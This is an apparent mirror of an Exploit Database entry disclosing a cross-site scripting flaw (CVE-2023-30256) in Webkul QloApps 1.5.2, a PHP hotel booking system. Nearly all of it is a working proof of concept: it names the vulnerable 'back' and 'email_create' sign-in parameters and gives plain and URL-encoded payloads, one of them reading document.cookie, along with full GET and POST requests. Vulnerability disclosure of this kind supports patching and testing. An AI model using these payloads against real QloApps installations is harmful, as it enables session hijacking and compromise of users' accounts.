Webkul Qloapps 1.5.2 – Cross-Site Scripting (XSS)

• Exploit Database
• 15 阅读

• 作者： Astik Rawat
  日期： 2023-05-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51465/

• # Exploit Title: Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS)
  # Date: 15 May 2023
  # Exploit Author: Astik Rawat (ahrixia)
  # Vendor Homepage: https://qloapps.com/
  # Software Link: https://github.com/webkul/hotelcommerce
  # Version: 1.5.2
  # Tested on: Kali Linux 2022.4
  # CVE : CVE-2023-30256
  
  
  Description:
  
  A Cross Site Scripting (XSS) vulnerability exists in Webkul Qloapps which is a free and open-source hotel reservation & online booking system written in PHP and distributed under OSL-3.0 Licence.
  
  Steps to exploit:
  1) Go to Signin page on the system.
  2) There are two parameters which can be exploited via XSS
  	- back
  	- email_create
  
  2.1) Insert your payload in the "back"- GET and POST Request 
  	Proof of concept (Poc):
  	The following payload will allow you to execute XSS - 
  	
  	Payload (Plain text): 
  	xss onfocus=alert(1) autofocus= xss
  
  	Payload (URL Encoded): 
  	xss%20onfocus%3dalert(1)%20autofocus%3d%20xss
  
  	Full GET Request (back): 
  	[http://localhost/hotelcommerce-1.5.2/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(1)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d]
  
  2.2) Insert your payload in the "email_create" - POST Request Only
  	Proof of concept (Poc):
  	The following payload will allow you to execute XSS - 
  
  	Payload (Plain text): 
  	xss><img src=a onerror=alert(document.cookie)>xss
  
  	Payload (URL Encoded): 
  	xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss
  
  	POST Request (email_create) (POST REQUEST DATA ONLY): 
  	[controller=authentication&SubmitCreate=1&ajax=true&email_create=xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss&back=my-account&token=6c62b773f1b284ac4743871b300a0c4d]